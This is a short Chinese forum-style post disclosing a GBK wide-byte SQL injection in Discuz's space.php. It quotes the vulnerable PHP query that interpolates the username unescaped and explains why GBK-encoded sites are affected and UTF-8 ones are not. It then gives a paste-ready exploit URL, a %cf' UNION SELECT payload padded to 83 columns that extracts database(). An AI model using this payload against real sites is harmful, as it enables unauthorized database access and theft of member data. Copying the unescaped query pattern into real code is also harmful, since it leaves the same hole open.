$member = $db->fetch_first("SELECT m.*, mf.*, u.grouptitle, u.type, u.creditshigher, u.creditslower, u.readaccess,
  u.color AS groupcolor, u.stars AS groupstars, u.allownickname, u.allowuseblog, r.ranktitle,
  r.color AS rankcolor, r.stars AS rankstars $oltimeadd1
  FROM {$tablepre}members m
  LEFT JOIN {$tablepre}memberfields mf ON mf.uid=m.uid
  LEFT JOIN {$tablepre}usergroups u ON u.groupid=m.groupid
  LEFT JOIN {$tablepre}ranks r ON m.posts>=r.postshigher
  $oltimeadd2
  WHERE ".($uid ? "m.uid='$uid'" : "m.username='$username'")."ORDER BY r.postshigher DESC LIMIT 1");

discuz的空间功能 space.php

查询中包含username值查询,经过编码构造可产生注射漏洞 UTF-8 不存在此漏洞

最近常出现类似的编码注射漏洞,这是因为例如gbk这种编码下php服务器不能很好的过滤'号所以造成漏洞的发生,而使用UTF-8编码的程序不会出现这个问题,不会产生编码转换时的错误,引号得到了完好过滤,杜绝了编码注射漏洞的发生.

漏洞利用方法:

http://地址/space.php?username=%cf'%20UNION%20Select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,database(),83/*

带上软件截图~重写了2边...操了delphi的TGIFIMAGE控件没装好~累死....